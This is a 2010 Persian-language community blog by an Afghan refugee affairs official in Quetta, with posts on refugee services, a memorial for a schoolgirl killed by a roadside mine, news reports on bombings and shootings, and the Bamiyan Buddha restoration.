+ نوشته شده توسط آزادگان در 2010/10/26 و ساعت 6:20 PM |

بيانيه جلالتمآب استاد خليلي معاون رئيس جمهور در سومين کنفراس ملي شوراهاي انکشافي قريه ها

   29/7/1389
﴿بسم الله الرحمن الرحيم﴾حضار محترم! علمأ، فرهنگيان، موسفيدان، جوانان، خانم¬ها و آقايان!

السلام عليکم و رحمت الله و برکاته!

بسيار مسرت دارم که در روز اختتاميه سومين کنفراس ملي شورا هاي انکشافي قريه ها، شرکت نموده¬ام.
اين کنفرانس با توجه به حضور گسترده شما نمايندگانِ قريه ها، اميدواري هاي جديدي را در راستاي آبادي و بازسازي کشور، براي دولت و ملت افغانستان به وجود آورده است. حضور وسيع و متنوع شما - چنانچه از چهره هاي اميدوار و پرانگيزه شما خوانده مي شود- بيانگر اين مطلب است که نتايج اين کنفرانس، انعکاس دهنده خواسته ها، پيشنهادها و مطالبات متنوع مردم، در حوزه هاي مختلف خدماتي و انکشافي خواهد بود.


ادامه مطلب
+ نوشته شده توسط آزادگان در 2010/10/23 و ساعت 7:34 PM |

 

لیلا اسدی با تمام آرزو هایش شهید شد !

نوشته : مرتضی خرمی

لیلا اسم دختری است که شاید در دیار هجرت متولد شده بود و یا شاید در افغانستان . لیلا بعد از سپری شدن سالهای عمرش همانند دیگر دختر بچه ها به مکتب رفت . او مکتب را با عشق و علاقه فراوان و با حمایت  پدر و مهر وعاطفه مادر و باقی اعضای خانواده آغاز کرد و دوازده سال تمام را با مشق و املا و درسهای مکتب گذراند . لیلا همیشه به آینده می اندیشید . امید به آینده هر روز در وجود لیلا اضافه میشد . او هر روز که بزرگ و بزرگتر می شد آرزوهایش هم تغییر میکرد . تغییر در آرزوهای لیلا اکتفا نمودن به درس های مکتب نبود بلکه او آرزوهای بسیار بلند داشت و میخواست بعد از اتمام درسهای مکتب مثل سایر دختران به داخل کشور برود و شامل امتحانات کانکور شود . او برعلاوه درسهایش به ورزش هم علاقمندی زیاد داشت . او ورزش را یگانه راه سلامتی اش می دانست و به وجود خواهر ورزشکارش که در و دیوار خانه را مملو از لوحه های تقدیر - مدالهای متعدد و رنگارنگ نموده و حریفانش را پشت سرهم در مسابقات شکست داده بود - افتخار میکرد . لیلا دختر آرام - خوش برخورد و لایق بود . همه ی همصنفی ها و استادانش از درس و برخورد و اخلاق وی کاملاْ راضی بودند و لیلا را دوست داشتند . لیلا همیشه تمیز و پاک و آراسته به مکتب می رفت و هر روز به لیاقت و شایستگی او افزوده میشد و هر روز بشاش تر از روز های قبل سرکلاس حاضر می شد .

پدر لیلا همانند سایر پدر ان لیلا را بخاطر رسیدن به آرزوهایش حمایت مینمود . او بخاطری که مبادا لیلا احساس کمبودی کند و برای چرخاندن چرخ روز گار به ایران رفت و در آنجا کار میکرد . پدر بیجاره ی لیلا میخواست دخترش به آرزوهایش برساند و از اینکه لیلا امسال شاگرد صنف دوازدهم بود در پوست خود نمی گنجید و لیلا را تشویق میکرد تا به درسهایش ادامه دهد. با آنکه او دور از خانواده و لیلا زندگی میکرد اما میکوشید تا اسباب راحتی لیلا و بقیه فرزندانش را فراهم کند .

لیلا قبل از رسیدن امتحان سالانه که آخرین امتحان مکتبش بود با کاکای پدرش بخاطر گرفتن تذکره بمنظور اخذ شهادتنامه صنف دوازدهم اش و شرکت در امتحانات کانکور تصمیم گرفت از کویته به افغانستان برود . او بعد از رایزنی ها و گرفتن اجازه از پدر و مادر و مسئولین مکتب رابعه بلخی رهسپار افغانستان شد . لیلا بسیار آرزو داشت تا وطنش را ببیند و گرفتن تذکره بهانه ی باشد برای پیوستن مجدد به دامن مادر وطن . لیلا با کاکای پدرش روز جمعه تاریخی ۱۵ اکتوبر صبح هنگام کویته را به مقصد افغانستان ترک کرد . ساعت ها را منزل کرد تا وارد افغانستان شد . سرک های قیر شده و موتر های شیک را از نزدیک مشاهده کرد . او از بولدک بطرف جاغوری حرکت کرد و موتر حامل لیلا به سرعت بطرف جاغوری در حرکت بود . لیلا خیلی خوشحال بود تا در جاغوری رفته با دوستان و اقاربش که سالهای متمادی از آنان دور بوده دوباره ببیند و ملاقات کند و در مورد امتحانات کانکور معلوماتش را تکمیل و دوباره در دیار غربت به خانه اش  بر گردد و جشن فارغتش را با همصنفی هایش تجلیل کند و اولین آرزویش را محقق کند. اما لیلا از عاقبت خود و سر نوشت شومی که در انتظارش بود خبر نداشت و او پیوسته به محقق شدن آرزوهایش فکر می کرد و او اصلاْ باور نداشت که دوباره به خانه بر نمیگردد و یا به جمع دوستانش ملحق نمیشود . موتر همچنان در حرکت بود و فاصله لیلا لحظه به لحظه به مسیر اصلی و مورد نظرش یعنی زاده گاه آبایی و اجدادی اش نزدیک و نزدیکتر می شد . لیلا چندین شهر و آبادی را در داخل افغانستان پشت سر گذاشته بود و از کابوس جنگ چیزی در ذهنش تجلی نمیکرد . همه در داخل موتر از این درو و آن در میگفتند و گاهی هم فضای بیرون موتر و دشت و درختان را مشاهده میکرد که نا گهان صدای مهیب انفجار بوقوع پیوست و موتر حامل لیلا به ماین کنار جاده اصابت کرد . بعد از صدای انفجار سرو صدا ها بلند شد . تنها کسی که سرو صدا نکرد و از کسی برای نجاتش کمک نخواست لیلا بود . وجود لیلا با صدای انفجار ماین همزمان تکه تکه شد و برای لیلا امان نداد تا از کسی کمک بخواهد و یا کسی را کمک کند . جسم لیلا پاره پاره و تکه تکه شد . کاکای پدر لیلا جز آه و گریه و زاری چیزی از دستش ساخته نبود . لیلا دیگر زنده نبود و جسم بی روح آن دیگر آرزوی برای فردا نداشت . او دیگر به فردای پر فراز و نشیب فکر نمیکرد و برای همیشه با تمام آرزوهایش پرواز کرد و جسد تکه تکه اش در میان موتر ماند . لیلا با تمام آرزوهایش شهید شد . شهید شدن لیلا یک امر باور نکردنی و غیر قابل باور بود و هیچکسی باور نمیکرد لیلا شهید شده باشد. اما حقیقت همین بود که دیگر لیلا زنده نبود  و لیلا با تمام آرزوهایش از میان همه ی ما رفت و او رهسپار دیار ابدی شد و دژخیمان و تروریستان کور دل آخر دست شان بخون کسی آلوده شد که او امید زیاد برای آینده داشت . لیلا رفت ولی آرزوهایش باقی ماند ... لیلا هرگز برنخواهد گشت اما خاطرات لیلا برای همیشه باقی خواهد ماند. روحش شاد و یادش گرامی باد !

شهید لیلا اسدی در صحن حویلی لیسه عالی رابعه بلخی - هزاره تاون کویته

عکس ها توسط آقای اشرف جوادی به نشر رسیده است .

اشرف جوادی :

شهید لیلا اسدی و خواهرش مینا اسدی این عکس حدود یکماه قبل در
صحن لیسه عالی رابعه بلخی- کویته عکسبرداری شده است
غروب لیلا غروب خورشیدی است که آرمان هزاران دانشجویی را در خود انعکاس میدهد . مرگ لیلا سایه ی غم را بر زمین و زمان انداخته کلاسهای درس همه صدای لیلا را در خود انعکاس میدهد لیلایی که هیچ آموزگار و دانش آموز لیسه عالی رابعه بلخی از او خاطره ی تلخی ندارد . از لیلا فقط لبخندهایش برای ما مانده است و یک دم ناکامی و درد و و افسوس وحسرت روحش شاد و یادش گرامی باد

لیلا سوار توسن تابوت میشوی
آهسته خاک میشوی فرتوت میشوی
ما ابر میشویم بخاک تو میچکیم
ما دود میشویم، تو یاقوت میشوی
لیلا تو مرده ای به عدم گوش میکنی
خود را به سنگ گور هماغوش میکنی
لیلا تو رفته ای و ره خانه گشته گم
لیلا تو مرده ای و فراموش میکنی
فصل دریچه، موسوم زاغست سوگوار
آیینه و ستاره و باغست سوگوار
لیلا تو میروی و تن ات خاک میشود
لیلا تو مرده ای و چراغ است سوگوار

+ نوشته شده توسط آزادگان در 2010/10/18 و ساعت 8:24 PM |

دومین دور کورس های آموز  ش حرفوی برای مهاجرین افغان

در کویته برگزار میشود !

اتشه امور مهاجرین وعودت کنندگان افغانی مقیم کویته - پاکستان با نشر اطلاعیه از مهاجرین شهر کویته خواسته است که در کورس های شش ماهه حرفوی که از سوی  موسسه بین المللی مرسی کورپس راه اندازی میشود تا تاریخ ۲۲ اکتوبر سال ۲۰۱۰ میلادی در اتشه امور مهاجرین واقع جنرال قونسلگری جمهوری اسلامی افغانستان ثبت نام کنند .

شرایط :

اتشه امور مهاجرین شرایط آتی را بشمول بخش های کورس های آموزش حرفوی در اطلاعیه خویش گنجانیده است .

1- باید افغان باشد و در منطقه مورد نظر که کورس راه اندازی میشود زندگی کند.

2- باید  هر نفر این اسناد را داشته باشد / ویزه ، کارت مهاجرت ویا تذکره تابعیت افغانستان بشمول تصدیق محل جهت شمولیت در پروژه مورد نظر .

3- کاندیدا باید بین سن 18 الی 45 سال  باشد در صورتیکه به بیماری توبرکلوز مبتلا نباشند.

4 - آرزوی  بازگشت به افغانستان را داشته باشد

5- تنها یک نفر از هر فامیل انتخاب میشود .

 6 - کاندیدا باید حد اقل  % 85 به حاضری صنف موافقه داشته و در امتحان تحریری که از طرف " تی تی سی " آماده گردیده حاضر شود.

7- پالیسی " تی تی سی "  را احترام کند.

 8 -  هر وظیفه که از طرف  "  تی تی سی "   به ارتباط کار داده میشود قبول نموده و بخوبی انجام دهد .

9- آمادگی  برای کارهای عملی " تی تی سی " داشته باشد  .

10 - نباید آموزش یافتگان دوره اول " تی تی سی باشد " ، که در 15 جنوری  تا 15 جولای 2010  اموزش دیده است .   

 

کورس های حرفوی برای مردان :

*    موبایل سازی

*    پیپ کاری 

*     ولدینگ کاری

*    الکترونکس ( برق )

*    گلکاری

 *   موچی گری

*    کمپیوتر

کورس های حرفوی برای زنان  :

*     کشیده کاری

*     کمپیوتر

*    آشپزی

*      آرایشگری 

 موسسه بین المللی مرسی کورپس با همکاری اتشه امور مهاجرین افغانی  در دوره اول تعداد ۳۰۰ نفر از مهاجرین افغان را که عمرشان از ۱۸ الی ۴۵ سال بود  در بخشهای نلدوانی - ولدینگ کاری - برق - نجاری - گلکاری - انجنیری و غیره در تیکنیکل ترنینگ سنتر  شهر کویته آموزش داده و برعلاوه تدریس در بخش های مختلف برای هر شاگرد مبلغ ۱۰۰۰۰ روپیه پاکستانی معاش و کرایه موتر تادیه نموده  و در ختم کورس برای شاگردان وسایل کار نیز توزیع نمودند. همچنین به تعداد ۴۰ نفر از دختران مهاجر افغانی که نتوانسته بودند به داخل افغانستان عودت و به ادامه تحصیلات عالی شان بپردازند - از سوی موسسه بین المللی مرسی کورپس و اتشه امور مهاجرین - در بخش نرسنگ برای شش ماه آموزش دیدند . دولت پاکستان به همه ی فارغین اجازه کار را داده تا برای جامعه با هم برادر پاکستان و افغانستان کار نموده و مصدر خدمت شوند . راه اندازی این کورس ها حرفوی ساختن مهاجرین می باشد تا حین عودت به افغانستان در کارهای عمرانی و بازسازی افغانستان سهیم گردند .

این بار نیز این کورس ها با تغییرات بیشتر و حرفه های مورد ضرورت مردم راه اندازی گردیده و ثبت نام برای کورس های نرسنگ و آموزش حرفه های مختلف برای اقشار ذکور و اناث ادامه دارد .  قرار است موسسه بین المللی مرسی کورپس ما هوار برای هر شاگرد مبلغ ده هزار کلدار بطور معاش ماهور و کرایه موتر تادیه نماید .

+ نوشته شده توسط آزادگان در 2010/10/12 و ساعت 10:32 AM |

 

ملاقات مسئولین اتشه امور مهاجرین و عودت کنندگان افغانی مقیم کویته با آقای نواب محمد اسلم رئیسانی وزیر اعلی صوبه بلوچستان پاکستان

 ساعت پنج عصر روز شنبه مورخ ۱۰ میزان سالجاری وعده ی ملاقاتی که قبلاْ با وزیر اعلی صوبه بلوچستان تنظیم شده بود  وارد محوطه دفتر وزیر اعلی شدیم . دوستان از ما پذیرایی بسیار گرم کردند و مستقیماً به دفتر وزیر اعلی رهنمایی شدیم . در دفتر جناب وزیر اعلی داخل شدیم که ایشان با چند نفر دیگر مصروف صحبت بود . با دیدن ما از جایش بلند و همرای اتشه امور مهاجرین ، بنده و خلیل الرحمان جان احوال پرسی بسیار صمیمانه کرد . اصلاً در بین ما سکوتی حکفرما نشد و شروع به صحبت و احوال پرسی کردیم و از استقبال آقای رئیسانی چنین معلوم میشد که ما سالهای سال با هم آشنا بودیم و یکدیگر مان را میشناخیتم . خلاصه سرتان را به درد نیاورم بعد از معرفی خودمان و تشکر از مهمان نوازی مردم صوبه بلوچستان ازمهاجرین رفتیم روی اصل مطالب که مهاجرین ما به مشکلات جدی مواجه می باشند .
یک : نبود آب آشامیدنی صحی کافی در کمپ های مهاجرین صوبه بلوچستان بخصوص در کمپ های سرانان کهنه و نو
دوم : نبود ادویه کافی و پرسونل صحی در کلنیک های کمپ های ده گانه مهاجرین
سوم: نبود احصائیه و ارقام دقیق زندانی های افغان و مساعد نشدن زمینه بازدید از زندانهای صوبه بلوچستان که در آنها مهاجرین افغانی زندانی می باشند .
چهارم : تقاضای همکاری در خصوص شمولیت مهاجرین افغان در موسسات تحصیلات دولتی و خصوصی تا طی مراحل اسناد و مدارک فارغان مکاتب افغانی .
پنجم : تقاضای همکاری در زمینه ایجاد پروژه های حرفوی ، تکنالوژی معلوماتی و مسلکی سازی مهاجرین افغان
ششم : تقاضای جلوگیری از اختطاف مهاجرین ، چندین بار اختطاف گران مهاجرین را اختطاف و در بدل پول رها نموده اند .
هفتم : جلوگیری از اذیت و آزار مهاجرین حین گشت و گذارشان در صوبه بلوچستان بخصوص در چیک پوست بلیلی ، جلوگیر ساحه کچلاک و تهانه بروری .
هشتم : تقاضای تهیه آمار و ارقام مهاجرینی که در زندانها به سر می برند و وقت شان تکمیل گردیده و بنا به تادیه نکردن جریمه شان تا حال زندانی می باشند .
آقای رئیسانی برای ما وعده ی هرنوع همکاری داد و از خاطرات رفتنش به داخل افغانستان زیاد صحبت کرد و جالب اینکه ایشان به زبان های فارسی و پشتو بسیار مسلط بود .
آقای وزیر اعلی به دستیارش دستور داد که همه ی مسئولینی که پیشنهادات دفتر ما به آنان رابطه دارد ساعت پنج و سی عصر دعودت نماید و از ما هم خواست که تمام مسایل را فردا به بحث و بررسی می گیریم و من هدایت میدهم تا همه ی کارها به زودی اجرا شود .
ما هم خدا حافظی کردیم و برخورد آقای رئیسانی بسیار فوق العاده و صمیمانه بود.
. روز شنبه ساعت پنج و سی عصر دوباره به دفتر وزیر اعلی رفتیم و برخورد همچنان صمیمانه تر شده بود . چند دقیقه ی نشستیم و چای خوردیم دوباره ما را در دفتر آقای رئیسانی رهنمایی کردند . بقیه شرکای جلسه هم تشریف آورده بودند که عبارت از کمشنر مهاجرین افغان ، هوم سکرتر ، وزیر صنعت ، وزیر خوراک ، وزیر ریونیو ، آی جی پولیس و آی جی جیل خانه جات بود و آقای رئیسانی من و آقای عزیز را بسیار به مهربانی به اعضای جلسه معرفی نمود .
بعد از معرفی از اتشه امور مهاجرین خواست تا موضوعات دیروز را مطرح کند . موضوعات فوق یکایک مطرح شد و به مسئولین هدایت داده شد که در زمینه همکاری کنند. هرکدام از اعضای جلسه نمرات تلیفون شان را در اختیار ما گذاشته و اطمینان دادند که از هیچ نوع همکاری در حصه رفع مشکلات مهاجرین دریغ نمیورزند . ما هم از یکایک شان سپاسگذاری کرده و بخاطر عملی شدن کارها گفتیم که خدمت تان می رسیم .
اتشه امور مهاجرین مصمم است تا روی هشت موضوع فوق به صورت جدی کار کند تا مهاجرین عزیز به راحتی کامل بتوانند زندگی کنند .
از اینکه منتظر ماندید از شما عذر خواهی میکنم .. دوستان عزیز هرکدامشان اگر سوالی در زمینه داشته باشند حتی الامکان کوشش میکنم پاسخ آنرا ارایه کنم . موفق و سربلند و سر افراز باشید .

+ نوشته شده توسط آزادگان در 2010/10/4 و ساعت 8:17 PM |

تروریستان باز در کویته جنایت کردند !

رسانه ها گزارش داده میگویند . دیروز افراد ناشناس در ساحه هزار گنجی بالای موتری که از مارکیت به سمت هزاره
تاون بر میگشت تیر اندازی کردند که در نتیجه مرادعلی و عبدالوهاب در موقع
جان باختند و محمد علی از شدت درد تاب نیاورده و در شفاخانه جان داد و
احمد شاه تحت تداوی قرار دارد .
پولیس و کارکنان صحی بعد از آگاهی در محل وقوع حادثه رسیده و کشته شدگان و زخمی ها را به شفاخانه منتقل نمودند.
ورثا و مردم محل نیز به شفاخانه رسیده و اجساد کشته شدگان را تحویل گرفتند.
این چندمین واقعه مشابه است ، که در ساحه هزار گنجی بوقوع می پیوندد و پولیس از گرفتاری مجرمان عاجز و ناکام بوده اند . مسئولیت این رویداد را کسی تا حال به عهده نگرفته و احتمال میرود که فرقه گرایان د راین قضیه دست داشته باشند .

+ نوشته شده توسط آزادگان در 2010/9/29 و ساعت 11:46 AM |
 

الحاج کاظم الله یار معاون والی ولایت غزنی امروز

در یک حمله انتحاری کشته شد .

بر اساس گزارش های رسیده، صبح امروز در نتیجهء يک انفجار بسیار قوى در شهر غزنى، کاظم الله يار معاون والى و دو عضو خانوادۀ وى کشته شده و به يک تعداد افراد ملکى نيز تلفات وارد گرديده است.گزارش می افزاید،‌اين انفجار، حوالى ساعت هشت صبح امروز ...(٦ميزان) در بين شهر به وقوع پيوست.
احمد رفیق یکی از مقامات پولیس سرحدی غزنی به رسانه ها گفته است که فرد انتحار کننده سوار بر یک موترسیکل بود و زمانی که عقب موتر معاون والی رسید خود را انفجار داد که در نتیجهء آن آقای الله یار و یک پسرش و دو تن از محافظینش کشته شدند

+ نوشته شده توسط آزادگان در 2010/9/28 و ساعت 12:55 PM |
                  پروسه تمدید کارت مهاجرت مهاجرین افغان در

 سراسر پاکستان آغاز شد

کارت مهاجرت مهاجرین افغان که در سال 2006 میلادی در پاکستان توزیع و مدت اعتبار آن در اخیر سال 2009 ختم گردیده بود ، بعد از توافقنامه سه جانبه میان دولت های اسلامی افغانستان و پاکستان و اداره کمشنری عالی ملل متحد در امور پناهندگان ، دیروز دوشنبه تاریخ 20 سپتامبر سال 2010 میلادی کار پروسه تمدید آن برای سه سال دیگر در صوبه بلوچستان و سراسر پاکستان رسماً آغاز گردید .  

 مهاجرین افغانی بعد از ختم معیاد کارت مهاجرت شان به مشکلات گوناگون درکشور میزبان  ( پاکستان ) مواجه بودند که خوشبختانه تمدید کارت جدید مهاجرت بودو باش مهاجرین افغان را تا ختم سال 2012 تضمین و مشکلات شان در این کشور حل خواهد شد . 

   کاراین پروسه تا 28 ماه فبروری 2011 ادامه خواهد یافت.   

برای مهاجرین افغان در صوبه بلوچستان  12سایت ایجاد گردیده وهر سایت روزانه تعداد 439 نفر را ثبت نام می نماید و کار سایت ها  مدت  125 روز در نظر گرفته شده است . ثبت نام کنندگان بعد از 15 روز میتوانند کارتهای جدید شان را ازسایتی که ثبت نام نموده تحویل خواهندگرفت .                                                         

آنعده اعضای باقیمانده خانواده های مهاجرین که در پروسه قبلی راجسترشده و از گرفتن کارت محروم گردیده بودند ، بعد از طی مراحل اداری کارت مهاجرت اخذ خواهند کرد .       

   هکذا مسئولین اتشه دیروز از سایت های مناطق شیخ مانده و بروری بازدید بعمل آورده و موضوعات مهم را با مسئولین سایت ها شریک ساختند و از شروع پروسه ثبت نام به مهاجرین آگاهی دادند .

+ نوشته شده توسط آزادگان در 2010/9/21 و ساعت 10:28 AM |

+ نوشته شده توسط آزادگان در 2010/9/9 و ساعت 1:15 PM |

معرفی کتاب سیاست و عقلانیت

( چکیده ای از کار نامه سیاسیاستاد محمد کریم خلیلی در فصل جدید )

+ نوشته شده توسط آزادگان در 2010/9/7 و ساعت 9:5 AM |

در حادثه روز گذشته شهر کویته مقصر کیست ؟

جمعه اخیر ماه مبارک رمضان بنا به دستور حضرت آیت الله خمینی رهبر فقید جمهوری اسلامی ایران روز همایش وحدت و همبستگی مسلمانان جهان بمنظور تقبیح جنایات رژیم صهیونیستی می باشد که در سالهای قبل اعلام شد و از سالیان متمادی تا حال این روز بعنوان روز نماد وحدت اسلامی مسلمانان در اکثر کشور های اسلامی و جهان از جمله در پاکستان تجلیل میگردد و در تجلیل از این روز سخنرانان تجاوز رژیم یهودی ( اسرائیل ) را برسر مردم مظلوم و زجر دیده فلسطین تقبیح و حمایت شان را طی تظاهرات مسالمت آمیز از مردم فلسطین ابراز میدارند .

در تظاهرات روز جهانی قدس،اکثر مسلمانان درنقاط مختلف جهان اشتراک مینمایند ، زیرا این راهپیمایی ها بخاطر حمایت مردم فلسطین و آزادی بیت المقدس قبله اول مسلمانان صورت میگیرد .

اما دیروز مورخ 2010/9/3 میلادی  تظاهرات مسالمت آمیز امسال مردم  در شهر کویته بدون خون ریزی پایان نیافت . نماز گذاران و روزه داران شیعی بعد از ادای نماز جمعه ، امامباره کلان ( بزرگ ) شهر کویته را به مقصد میزان چوک ( محل تجمع ) ترک و بعد از رسیدن در آن ساحه انفجار مهیبی رخ داد. شاهدان عینی میگویند که شخص انتخار کننده قصد داشت خودش را در بالای موتر در نزدیکی محل سخنرانان ( ستیژ ) برساند و از آنجا خودش را منفجر کند. زمانی که مردم به وی اجازه ی ورود ندادند از بالای موتر پایین افتاد و خودش را در میان جمعیت خاموش و سکوت راهپیمایان به سرعت منفجر ساخت . همزمان با انفجار وی از پنجره های ساختمان بلدیه بالای مردم تیر اندازی های زیاد آغاز شد و تعدادی زیادی از مردم جانهای شان را از دست دادند و تعدادی هم آتش گرفتند . و آنها اظهارات مقامات پولیس را بی اساس خوانده میگویند  که پولیس اجازه ورود به منطقه میزان چوک را  برای آنها داده بود ند ، اما در تامین امنیت شان اقدام نکرده بودند و مردم این کار را یک دسیسه از قبل طرح ریزی شده از سوی حکومت میدانند . مردم مدعی اند که بعد از انفجار و فیر بالای  مظاهره کنندگان هیچ نیروی پولیس و نیروی آتش فشانی ( اطفائیه ) در محل واقعه نرسیدند و بعد از مدت یک ساعت ، زمانیکه نیروهای ( ایف سی ) و پولیس در محل واقعه رسیدند آنان نیز بالای مردم تیر اندازی زیاد کردند که در نتیجه حدود 60 نفر توسط تیر اندازی آنان به شهادت رسیدند و رسانه ها تعداد مجموعی مجروحین و شهدا را بیشتر از 200 نفر اعلام نموده اند.

مقامات پولیس این گفته های مردم را رد نموده میگویند که آنها بر خلاف مسیر از قبل تعیین شده راهپیمایی نموده و به سمت میزان چوک رفته اند و همچنان از ورود فرد انتحار کننده در میزان چوک ووقوع احتمالی حمله انتخاری آنان را آگاه ساخته بودند .

 اکثر زحمی های این حادثه در شفاخانه های سمیچ ، سیول و بولان  شهر کویته منتقل  و تعدادی از آنان بنا به خونریزی های زیاد جانهایشان را از دست دادند .

گفته میشود فرد انتحار کننده جوان 22 ساله بوده و مقدار 10 - 15 کیلو گرام مواد منفجره را به بدن خود  بسته بوده و سر جداشده آن نیزدر محل واقعه بجا مانده  و تصویر آن  در مطبوعات نیز منتشر گردیده است .

گزارش ها میافزاید که دو پیکر شهید دیروز در قبرستان بروری بخاک سپرده شدند و 72 پیکر دیگر که متعلق به مردم هزاره ، پنجابی ، توری و گلگتی می باشند،  امروز ساعت 10 قبل از ظهر در هزاره قبرستان  واقع مری آباد با حضور هزاران نفر از شخصیت های مختلف بخاک سپرده شدند . گفته میشود در میان کشته شدگان ده نفر پشتون نیز بوده که در کمپ های جمع آوری کمک ها به سیلاب زدگان مصروف کار بودند .

شاهدان عینی میگویند  مردم خشن و عزادار که عزیزان شان را در این واقعه جانگداز از دست داده اند ، آقای علامه دومکی و سید هاشم  را در هزاره قبرستان لت و کوب نموده و آنان را مقصر اصلی واقعه دیروز خوانده و نگذاشته اند که در مراسم تدفین شهدا حضور داشته باشند .

امروز در تمام شهر کویته و نواحی مختلف آن هرتال ( اعتصاب ) بود و همه ی دکانهای شهر نیز مسدود بودند .

شیعه کنفرانس چهل روز را سوگ عمومی در صوبه بلوچستان اعلام نموده است و حکومت را مقصر اصلی دانسته میگویند که افراد مربوط به حکومت در وظایف محوله شان سهل انگاری نموده اند و میگویند اگر حکومت از ورود انتحار کننده آگاهی داشته پس چرا مردم را در جریان نگذاشته و در تامین امنیت مظاهره کنندگان اقدام نکردند.

مقامات حکومتی ادعای شیعه کنفرانس را رد نموده میگویند ، که  قبلاً آنها را ازو وقوع حمله و ورود انتحار کننده آگاه ساخته بودند .

طالبان پاکستانی ، مسئولیت حمله های اخیر لاهور و کویته را طی تماس به رسانه ها به عهده گرفته اند .

واقعه دیروز ، دلخراش ترین واقعه در سال 2010 میلادی در صوبه بلوچستان می باشد و بعد از واقعه سه روز قبل لاهور کلانترین حادثه در سطح پاکستان محسوب میگردد .

شاهدان عینی میگویند ، که سربراه های مظاهره کنندگان دیروز علامه دومکی ، سید هاشم و عامر طوری بوده است .

مردم شهر کویته از وقوع حادثه المناک دیروز کاملاً متاثر می باشند و تبصره های مختلف در میان شان وجود دارد و سوالی که تا حال در نزد مردم حل ناشده باقیمانده است این است ، که در حادثه روز گذشته مقصر کیست ؟

انفجار لاهور

+ نوشته شده توسط آزادگان در 2010/9/4 و ساعت 4:43 PM |
سلام به تمام دوستان و علاقمندان وبلاگ آزادگان ! دوستان عزیز در وهله نخست صحت و سلامتی شما را از خداوند بزرگ میخواهم و ثانیاً از خداوند منان آرزو دارم که طاعات و عبادات شما را مقبول درگاه خویش قرار دهد و از همه ی مشکلات ، آفات و بلیات محفوظ و در حفظ پناه ذات اقدس الهی باشید .

ثالثاً معذرت میخواهم از اینکه وبلاگ آزادگان برای چند مدتی آپدت نشده بود و گزارش ها و مطالب جدید در آن نشر نگردید و بنده بخاطر اجرای کارهای دفتر به کابل عزیمت نموده بودم . امید است بنده را مورد عفو قرار دهید و سر از امروز وبلاگ آزادگان انشاالله با تمام گزارشها و مطالبش در خدمت شما عزیزان قرار دارد .

بدرود

مخلص شما خرمی

+ نوشته شده توسط آزادگان در 2010/9/3 و ساعت 9:58 AM |

تحکیم کاری بودای خورد بامیان پایان یافت


بعد از حملات وحشیانه طالبان وتروریزم بین المللی ، مدتی سه سال است که کاربرای تحکیم کاری بودای خورد( شمامه) بامیان ادامه داشت .

http://radiozamaaneh.com/pictures-new/budayebamian-o2.jpg

داکتر حبیبه سرابی والی بامیان میگوید " اداره یونیسکو با همکاری موسسه ای کومس جرمنی بمدت سه سال توسط متخصیصن ملی وبین المللی برنامه ای را برای تحکیم کار حداره های این بود روی دست داشت که خوشبختانه روز

( چهارشنبه مورخ 30 سرطان)کار عملی واساسی ان به پایان رسید."

در مراسم که به مناسب پایان یافتن کار تحکیم کاری بودا شام روز چهار شنبه تدویر یافته بود ، تعدادی زیادی از فرهنگ دوستان ومقامات محلی اشتراک ورزیده بودند .  آویزان کردن الکین ها در اطراف جداره های شاهمامه زیبایی های خاصی را بوجود آورده بود که از دور نمای بسیارزیبای را ایجاد نموده وهر بیننده را بیادی آن روایات روشن شدن چشمان بودا در قدیم می انداخت.

مجتبی میرزایی متخصص مجرب افغانی الاصل جرمنی که مسئولیت بخشی از این پروژه را بعهده داشت ، گفت : در مدت سه سال تمامی کارمندان این پروژه بدون درنظرداشت احساس خستکی بطور مداوم ومشتاقانه کارکردند که امروز نتجه آنرا شما به چشم سر می بینند.

بسم الله تابان مشاور/ کارشناس امنیتی ولایت بامیان ویکی از فرهنگیان کشور میگوید: تحیکم جداره های بودای خورد از چند بُعدبا اهمیت بود ؛ در ابتدا از لحاظ امنیتی که اگر به این موضوع توجه نمی شد میتوانست برای توریستان خطر جدی مطرح می بود که خود باعث کمرتگ شدن بازدید کنندگان آن میشد دوماً از نظر فرهنگی ، اگر برای تحکیم کاری این اثر ارزشمند اهمیت داده نمیشد شاید چند سال بعد ما شاهد همان جداره های بودن مجسمه نیز نخواهیم بود.

این عمل اداره یونسکو با اسقتبال غیر قابل انتظار فرهنگیان بامیان همراه بود.

گزارشگر : مرضیه خرمی - بامیان

+ نوشته شده توسط آزادگان در 2010/7/22 و ساعت 8:43 AM |

ویژه نامه تقبیح هجوم کوچی های مسلح به هزارستان
به تعداد 1000 نسخه که شامل 70 صفحه می باشد از سوی بنیاد شهید مزاری و
تنظیم نسل نو هزاره مغل در کویته منتشر شد . این ویژه نامه شامل مقالات
تحلیلی ، گزارشها ، متن های بیانیه ها ، قطعنامه ها ، حکم رئیس جمهور کرزی ،
تحصن وکلای شورای ملی ، سفر های استاد خلیلی و سخنرانی و کنفرانسهای
مطبوعاتی اش و اشعار در مورد تراژیدی حوادث اخیر بهسود می باشد . خوانندگان
محترم میتوانند متن کامل این وِیژه نامه را از طریق وب سایت تنظیم نسل نو
هزاره مغل ملاحظه فرمایند . مطالب این ویژه نامه را بنده جمع آوری نموده
بودم و خواستم بعنوان یک سند رسمی اعتراضات مدنی مردم ما را به نسل های
امروز و فردا تقدیم کنم . دوستان پیشنهاد کردند تا در مورد جنایات کوچی ها و
عوامل تاریخی آن کتابی را تهیه و به دست نشر بسپارم . اگر فرصت یافتم این
کار را انجام خواهم داد . این ویژه نامه شاید خالی از مشکلات نباشد ، اما
از تمام خوانندگان محترم تقاضامندم در صورت برخورد به مسایل املایی و
انشایی ، تایپ و دیزاین آن بنده را مورد عفو و بزرگواری شان قرار دهند .
خرمی
20-7-2010 برابر با 29 -4-1389
+ نوشته شده توسط آزادگان در 2010/7/21 و ساعت 11:9 AM |

 سفیرجاپان در دیدارش با والی بامیان عنوان نمود:

کشورما بر ادامه کمک های خود در افغانستان متعهد است

شیگه یوکی هیروکی سفیر جاپان مقیم کابل در سفر که عمر سلطان معین فرهنگی وزارت اطلاعات وفرهنک ، نماینده وزارت خارجه جاپان ، نماینده یونیسکو آقای برن دن وی را همراهی می نمود در دیداری با والی بامیان  در تاریخ 22 سرطان 1389 ضمن این بر ادامه کمک های کشورش در بازسازی افغانستان تاکید کرده گفت : افغانستان وجاپان با پیشنیه تاریخی دوستی که دارد همواره سعی خواهد نمود تا به عنوان یک کشور دوست با تمامی غم وشادی افغانستان خود را شریک میدانیم.

آقای هیروکی گفت: با توجه به اینکه ما در مجموع با دولت افغانستان همکاری نزدیک داریم بامیان  به عنوان یک مرکز فرهنگی دارای با پیشنیه خوب تاریخی  نقطه ای عطف برای همکاری ماست.

